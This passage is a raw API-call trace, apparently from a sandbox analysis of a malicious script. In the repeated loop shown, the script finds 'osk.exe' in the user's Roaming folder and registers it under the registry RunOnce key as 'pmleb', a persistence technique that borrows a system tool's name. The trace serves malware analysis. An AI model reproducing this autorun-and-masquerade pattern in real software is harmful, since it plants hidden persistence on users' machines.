Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.844] IUnknown:Release (This=0x787518) returned 0x1 [0081.844] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.844] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.844] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.844] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 
0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.844] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.844] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0081.844] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.844] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x50 [0081.844] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, 
pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.845] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4f [0081.845] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.845] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.845] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.845] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.845] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.846] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.846] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.846] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, 
phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.846] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.846] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.846] RegCloseKey (hKey=0x280) returned 0x0 [0081.846] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.846] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.846] SetTimer (hWnd=0x20280, nIDEvent=0x20cb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cb [0081.847] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.859] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.859] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.859] KillTimer (hWnd=0x20280, uIDEvent=0x20cb) returned 1 [0081.859] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.859] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 
[0081.859] IUnknown:Release (This=0x787518) returned 0x1 [0081.859] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.859] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.859] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.860] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, 
Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.860] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.860] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0081.860] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.860] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x51 [0081.860] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 
pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.861] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x50 [0081.861] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.861] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.861] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.861] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.861] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.861] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.861] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.861] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.861] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.862] WideCharToMultiByte (in: 
CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.862] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.862] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.862] RegCloseKey (hKey=0x280) returned 0x0 [0081.862] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.862] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.862] SetTimer (hWnd=0x20280, nIDEvent=0x20cc, uElapse=0xa, lpTimerFunc=0x0) returned 0x20cc [0081.862] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.874] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.874] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.874] KillTimer (hWnd=0x20280, uIDEvent=0x20cc) returned 1 [0081.875] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.875] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.875] IUnknown:Release (This=0x787518) returned 0x1 [0081.875] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.875] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.875] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.875] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: 
ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.875] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.876] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0081.876] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.876] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x52 [0081.876] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.877] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x51 [0081.877] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.877] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.877] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.877] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.877] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.877] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.877] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.877] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", 
cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.877] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.877] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.877] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.878] RegCloseKey (hKey=0x280) returned 0x0 [0081.878] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.878] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.878] SetTimer (hWnd=0x20280, nIDEvent=0x20cd, uElapse=0xa, lpTimerFunc=0x0) returned 